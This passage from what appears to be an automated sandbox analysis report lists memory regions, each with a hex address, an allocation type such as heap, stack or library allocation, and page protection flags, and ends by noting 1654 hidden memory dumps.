trusted library allocation
page read and write
70F000
heap
page read and write
4B30000
trusted library allocation
page read and write
560000
heap
page read and write
30CB000
heap
page read and write
34A1000
trusted library allocation
page read and write
2C09000
trusted library allocation
page read and write
2A9A000
trusted library allocation
page read and write
7FF00170000
trusted library allocation
page execute and read and write
B28000
heap
page read and write
4B0000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
1BDEE000
stack
page read and write
2C08000
trusted library allocation
page read and write
34C2000
trusted library allocation
page read and write
2524000
heap
page read and write
72D0000
heap
page read and write
2CF0000
trusted library allocation
page read and write
2AC000
stack
page read and write
2C20000
heap
page read and write
1FC1000
trusted library allocation
page read and write
2CDE000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
2B1D000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
450000
trusted library allocation
page read and write
2925000
trusted library allocation
page read and write
2937000
trusted library allocation
page read and write
913E000
trusted library allocation
page read and write
1AC000
heap
page read and write
190000
heap
page read and write
330000
heap
page read and write
4786000
heap
page read and write
186000
heap
page read and write
560000
heap
page read and write
630000
heap
page read and write
2950000
trusted library allocation
page read and write
1FC1000
trusted library allocation
page read and write
2955000
trusted library allocation
page read and write
302B000
heap
page read and write
3027000
heap
page read and write
3091000
heap
page read and write
34A1000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
4A79000
heap
page read and write
2B74000
heap
page read and write
2B1D000
trusted library allocation
page read and write
30C7000
heap
page read and write
32E3000
trusted library allocation
page read and write
2BF1000
trusted library allocation
page read and write
88D0000
trusted library allocation
page read and write
292D000
trusted library allocation
page read and write
3228000
trusted library allocation
page read and write
2330000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
18F000
heap
page read and write
56B000
heap
page read and write
3491000
trusted library allocation
page read and write
30CB000
heap
page read and write
2590000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
2470000
trusted library allocation
page read and write
34A1000
trusted library allocation
page read and write
3035000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
7FF000E5000
trusted library allocation
page read and write
2F81000
trusted library allocation
page read and write
346000
heap
page read and write
1FE4000
trusted library allocation
page read and write
3653000
trusted library allocation
page read and write
2CDE000
trusted library allocation
page read and write
420000
heap
page read and write
34C2000
trusted library allocation
page read and write
30C9000
heap
page read and write
2F6E000
stack
page read and write
2B20000
trusted library allocation
page execute
2926000
trusted library allocation
page read and write
2FF5000
trusted library allocation
page read and write
3101000
heap
page read and write
2B1D000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
3091000
heap
page read and write
72E7000
heap
page read and write
39F000
heap
page read and write
10000000
unkown
page readonly
7FF00250000
trusted library allocation
page execute and read and write
2D0000
heap
page read and write
301B000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
2D7F000
trusted library allocation
page read and write
2F40000
trusted library allocation
page read and write
925E000
trusted library allocation
page read and write
3046000
heap
page read and write
3032000
heap
page read and write
4B24000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
3EC000
heap
page read and write
8FCE000
trusted library allocation
page read and write
2C02000
trusted library allocation
page read and write
2FA4000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
30CD000
heap
page read and write
1FE4000
trusted library allocation
page read and write
3180000
trusted library allocation
page read and write
30F4000
heap
page read and write
4B30000
trusted library allocation
page read and write
1F0000
heap
page read and write
2740000
trusted library allocation
page read and write
2D30000
trusted library allocation
page execute
2474000
heap
page read and write
1FE4000
trusted library allocation
page read and write
10000
heap
page read and write
1FA4000
trusted library allocation
page read and write
925E000
trusted library allocation
page read and write
27DF000
stack
page read and write
1FE4000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
82DE000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
310000
heap
page read and write
34CF000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
34BA000
trusted library allocation
page read and write
8D7E000
trusted library allocation
page read and write
72D8000
heap
page read and write
10057000
unkown
page read and write
7FF00270000
trusted library allocation
page execute and read and write
346D000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
744000
heap
page read and write
4B30000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
155000
heap
page read and write
2C1B000
trusted library allocation
page read and write
2C1D000
trusted library allocation
page read and write
293A000
trusted library allocation
page read and write
1ED3000
trusted library allocation
page read and write
84EE000
trusted library allocation
page read and write
4B30000
trusted library allocation
page read and write
1FA4000
trusted library allocation
page read and write
281A000
trusted library allocation
page read and write
2450000
heap
page read and write
2800000
trusted library allocation
page read and write
3070000
trusted library allocation
page read and write
72DE000
heap
page read and write
1FE7000
trusted library allocation
page read and write
8E9E000
trusted library allocation
page read and write
2AFB000
stack
page read and write
674000
heap
page read and write
1C6BE000
stack
page read and write
2B1D000
trusted library allocation
page read and write
A83000
trusted library allocation
page read and write
30CB000
heap
page read and write
906E000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
533000
trusted library allocation
page read and write
884E000
trusted library allocation
page read and write
8E9E000
trusted library allocation
page read and write
1B90000
heap
page read and write
2B4000
heap
page read and write
28DE000
stack
page read and write
307A000
heap
page read and write
2927000
trusted library allocation
page read and write
2EAB000
stack
page read and write
1005A000
unkown
page readonly
1FC1000
trusted library allocation
page read and write
392000
heap
page read and write
300B000
trusted library allocation
page read and write
2E40000
trusted library allocation
page read and write
573000
heap
page read and write
1FA4000
trusted library allocation
page read and write
853E000
trusted library allocation
page read and write
3050000
heap
page read and write
2492000
heap
page read and write
4B24000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
34E000
heap
page read and write
654000
heap
page read and write
34A1000
trusted library allocation
page read and write
226F000
trusted library allocation
page read and write
3154000
trusted library allocation
page read and write
1FC8000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
1B570000
heap
page read and write
2B1D000
trusted library allocation
page read and write
30D2000
heap
page read and write
1FE4000
trusted library allocation
page read and write
31DE000
stack
page read and write
2F7E000
stack
page read and write
18E000
heap
page read and write
1FC1000
trusted library allocation
page read and write
2BF9000
trusted library allocation
page read and write
4B24000
trusted library allocation
page read and write
3AB000
heap
page read and write
4786000
heap
page read and write
247E000
stack
page read and write
1C710000
heap
page read and write
73A000
heap
page read and write
196000
heap
page read and write
30CD000
heap
page read and write
2955000
trusted library allocation
page read and write
3077000
heap
page read and write
2929000
trusted library allocation
page read and write
288000
heap
page read and write
8F4E000
trusted library allocation
page read and write
2923000
trusted library allocation
page read and write
34CF000
trusted library allocation
page read and write
10053000
unkown
page read and write
4754000
heap
page read and write
4B18000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
34C2000
trusted library allocation
page read and write
30DF000
heap
page read and write
4E7000
heap
page read and write
565000
heap
page read and write
2955000
trusted library allocation
page read and write
1C96D000
stack
page read and write
30CE000
trusted library allocation
page read and write
1F94000
trusted library allocation
page read and write
3056000
heap
page read and write
474000
trusted library allocation
page read and write
2C1D000
trusted library allocation
page read and write
34A1000
trusted library allocation
page read and write
30CD000
heap
page read and write
7FF000D0000
trusted library allocation
page read and write
573000
heap
page read and write
DB0000
heap
page read and write
2C1B000
trusted library allocation
page read and write
30BC000
heap
page read and write
34C2000
trusted library allocation
page read and write
4B18000
trusted library allocation
page read and write
30FD000
heap
page read and write
1FA4000
trusted library allocation
page read and write
18D000
heap
page read and write
72D8000
heap
page read and write
312B000
trusted library allocation
page read and write
30000
heap
page read and write
1B577000
heap
page read and write
4B18000
trusted library allocation
page read and write
56B000
heap
page read and write
39D000
heap
page read and write
4B18000
trusted library allocation
page read and write
34C2000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
8F3000
trusted library allocation
page read and write
688000
heap
page read and write
83EE000
trusted library allocation
page read and write
34B8000
trusted library allocation
page read and write
10000000
unkown
page readonly
389000
heap
page read and write
1A3000
heap
page read and write
887E000
trusted library allocation
page read and write
913E000
trusted library allocation
page read and write
296E000
stack
page read and write
30DF000
heap
page read and write
2800000
trusted library allocation
page read and write
598000
heap
page read and write
40E000
heap
page read and write
82DE000
trusted library allocation
page read and write
4B18000
trusted library allocation
page read and write
30D2000
heap
page read and write
2860000
trusted library allocation
page read and write
484000
trusted library allocation
page read and write
34BA000
trusted library allocation
page read and write
30DF000
heap
page read and write
29CF000
stack
page read and write
24B000
stack
page read and write
E82E000
trusted library allocation
page read and write
2C1B000
trusted library allocation
page read and write
32E000
heap
page read and write
1005A000
unkown
page readonly
5D4000
heap
page read and write
2B1D000
trusted library allocation
page read and write
1FE4000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
490000
trusted library allocation
page read and write
29AD000
stack
page read and write
4B30000
trusted library allocation
page read and write
1D00000
trusted library allocation
page read and write
2FCE000
stack
page read and write
30C7000
heap
page read and write
1FE4000
trusted library allocation
page read and write
346D000
trusted library allocation
page read and write
2EB000
heap
page read and write
4B30000
trusted library allocation
page read and write
510000
heap
page read and write
568000
heap
page read and write
7FF001B0000
trusted library allocation
page execute and read and write
2F6F000
trusted library allocation
page read and write
2C14000
heap
page read and write
396000
heap
page read and write
3091000
heap
page read and write
4B24000
trusted library allocation
page read and write
302F000
trusted library allocation
page read and write
3100000
heap
page read and write
1A4000
trusted library allocation
page read and write
2925000
trusted library allocation
page read and write
26B000
stack
page read and write
1FE7000
trusted library allocation
page read and write
30F4000
heap
page read and write
304E000
trusted library allocation
page read and write
10000
heap
page read and write
312E000
stack
page read and write
34C2000
trusted library allocation
page read and write
2B1D000
trusted library allocation
page read and write
8A000
stack
page read and write
2FF0000
trusted library allocation
page read and write
30BA000
heap
page read and write
30B5000
heap
page read and write
10000
heap
page read and write
30C3000
heap
page read and write
887E000
trusted library allocation
page read and write
38E000
heap
page read and write
2B5E000
stack
page read and write
473000
trusted library allocation
page read and write
7318000
heap
page read and write
346D000
trusted library allocation
page read and write
1A0000
heap
page read and write
2580000
heap
page read and write
1FE4000
trusted library allocation
page read and write
2800000
trusted library allocation
page read and write
8ECE000
trusted library allocation
page read and write
87BE000
trusted library allocation
page read and write
20E0000
heap
page read and write
2937000
trusted library allocation
page read and write
2C1D000
trusted library allocation
page read and write
51E000
heap
page read and write
296000
heap
page read and write
34BA000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
291E000
stack
page read and write
30BC000
heap
page read and write
302F000
heap
page read and write
250000
trusted library allocation
page read and write
2C1B000
trusted library allocation
page read and write
34A1000
trusted library allocation
page read and write
312B000
trusted library allocation
page read and write
349C000
trusted library allocation
page read and write
10053000
unkown
page read and write
2F4C000
trusted library allocation
page read and write
4770000
heap
page read and write
312B000
trusted library allocation
page read and write
10000000
unkown
page readonly
7FF001F0000
trusted library allocation
page read and write
1F39000
trusted library allocation
page read and write
2A94000
trusted library allocation
page read and write
362A000
trusted library allocation
page read and write
10057000
unkown
page read and write
2955000
trusted library allocation
page read and write
2C0000
trusted library allocation
page read and write
7FF0024D000
trusted library allocation
page execute and read and write
3047000
heap
page read and write
1B56E000
heap
page read and write
4B30000
trusted library allocation
page read and write
1FE7000
trusted library allocation
page read and write
309C000
heap
page read and write
887D000
stack
page read and write
1FC8000
trusted library allocation
page read and write
1FC8000
trusted library allocation
page read and write
3058000
trusted library allocation
page read and write
34C2000
trusted library allocation
page read and write
2E43000
trusted library allocation
page read and write
There are 1654 hidden memdumps, click here to show them.